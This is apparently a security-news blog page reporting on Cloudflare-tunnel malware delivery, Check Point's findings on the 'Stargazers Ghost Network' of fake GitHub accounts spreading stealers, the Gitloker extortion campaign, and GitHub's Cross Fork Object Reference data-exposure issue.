Proofpoint reports that the email distribution wave that started on July 11 has distributed over 1,500 malicious messages, while an earlier wave from May 28 contained less than 50 messages.

Malicious email sample (Source: Proofpoint)

Hosting LNK files on Cloudflare offers several benefits, including making the traffic appear legitimate due to the service’s reputation.

Moreover, the TryCloudflare Tunnel feature offers anonymity, and the LNK-serving subdomains are temporary, so blocking them does not help defenders too much.

Ultimately, the service is free and reliable, so the cybercriminals do not need to cover the cost of setting up their own infrastructure. If automation is employed to evade blocks from Cloudflare, the cybercriminals can abuse those tunnels even for large-scale operations.

BleepingComputer reached out to Cloudflare for a comment on the activity reported by Proofpoint, and a company representative replied with the following statement:

Cloudflare immediately disables and takes down malicious tunnels as they are discovered by our team or reported on by third parties.

In the past few years, Cloudflare has introduced machine learning detections on our tunnel product in order to better contain malicious activity that may occur.

We encourage Proofpoint and other security vendors to submit any suspicious URLs and we will take action against any customers that use our services for malware.


Posted in Cyber Attacks, Exploits | Tagged Cyber Attacks, malware, Scam, TryCloudflare

‘Stargazer Goblin’ Creates 3,000 Fake GitHub Accounts for Malware Spread

Posted on July 29, 2024 - July 29, 2024 by Maq Verma

A threat actor known as Stargazer Goblin has set up a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a variety of information-stealing malware, netting them $100,000 in illicit profits over the past year.

The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to share malicious links or malware, per Check Point, which has dubbed it “Stargazers Ghost Network.”

Some of the malware families propagated using this method include Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine, with the bogus accounts also engaged in starring, forking, watching, and subscribing to malicious repositories to give them a veneer of legitimacy.

The network is believed to have been active since August 2022 in some preliminary form, although an advertisement for the DaaS wasn’t spotted in the dark until early July 2023.

“Threat actors now operate a network of ‘Ghost’ accounts that distribute malware via malicious links on their repositories and encrypted archives as releases,” security researcher Antonis Terefos explained in an analysis published last week.

“This network not only distributes malware but also provides various other activities that make these ‘Ghost’ accounts appear as normal users, lending fake legitimacy to their actions and the associated repositories.”

Different categories of GitHub accounts are responsible for distinct aspects of the scheme in an attempt to make their infrastructure more resilient to takedown efforts by GitHub when malicious payloads are flagged on the platform.


These include accounts that serve the phishing repository template, accounts providing the image for the phishing template, and accounts that push malware to the repositories in the form of a password-protected archive masquerading as cracked software and game cheats.

Should the third set of accounts be detected and banned by GitHub, Stargazer Goblin moves to update the first account’s phishing repository with a new link to a new active malicious release, thereby allowing the operators to move forward with minimal disruption.

Besides liking new releases from multiple repositories and committing changes to the README.md files to modify the download links, there is evidence to suggest that some accounts that are part of the network were previously compromised, with the credentials likely obtained via stealer malware.

“Most of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository takedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected,” Terefos said.

“It’s common to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit account associated with the Link-Repository updates the malicious link with a new one.”

One of the campaigns discovered by Check Point involves the use of a malicious link to a GitHub repository that, in turn, points to a PHP script hosted on a WordPress site and delivers an HTML Application (HTA) file to ultimately execute Atlantida Stealer by means of a PowerShell script.

Other malware families propagated via the DaaS are Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. Check Point further noted that the GitHub accounts are part of a larger DaaS solution that operates similar ghost accounts on other platforms such as Discord, Facebook, Instagram, X, and YouTube.

GitHub Accounts for Malware Spread

“Stargazer Goblin created an extremely sophisticated malware distribution operation that avoids detection as GitHub is considered a legitimate website, bypasses suspicions of malicious activities, and minimizes and recovers any damage when GitHub disrupts their network,” Terefos said.

“Utilizing multiple accounts and profiles performing different activities from starring to hosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost Network to minimize their losses when GitHub performs any actions to disturb their operations as usually only one part of the whole operation is disrupted instead of all the involved accounts.”

The development comes as unknown threat actors are targeting GitHub repositories, wiping their contents, and asking the victims to reach out to a user named Gitloker on Telegram as part of a new extortion operation that has been ongoing since February 2024.

The social engineering attack targets developers with phishing emails sent from “notifications@github.com,” aiming to trick them into clicking on bogus links under the guise of a job opportunity at GitHub, following which they are prompted to authorize a new OAuth app that erases all the repositories and demands a payment in exchange for restoring access.

It also follows an advisory from Truffle Security that it’s possible to access sensitive data from deleted forks, deleted repositories, and even private repositories on GitHub, urging organizations to take steps to secure against what it’s calling a Cross Fork Object Reference (CFOR) vulnerability.

“A CFOR vulnerability occurs when one repository fork can access sensitive data from another fork (including data from private and deleted forks),” Joe Leon said. “Similar to an Insecure Direct Object Reference, in CFOR users supply commit hashes to directly access commit data that otherwise would not be visible to them.”

In other words, a piece of code committed to a public repository may be accessible forever as long as there exists at least one fork of that repository. On top of that, it could also be used to access code committed between the time an internal fork is created and the repository is made public.

It’s however worth noting that these are intentional design decisions taken by GitHub, as noted by the company in its own documentation –

  • Commits to any repository in a fork network can be accessed from any repository in the same fork network, including the upstream repository
  • When you change a private repository to public, all the commits in that repository, including any commits made in the repositories it was forked into, will be visible to everyone.

“The average user views the separation of private and public repositories as a security boundary, and understandably believes that any data located in a private repository cannot be accessed by public users,” Leon said.

“Unfortunately, […] that is not always true. What’s more, the act of deletion implies the destruction of data. As we saw above, deleting a repository or fork does not mean your commit data is actually deleted.”

Posted in Cyber Attacks, Data Breaches | Tagged fake github, malware, Stargazer Goblin
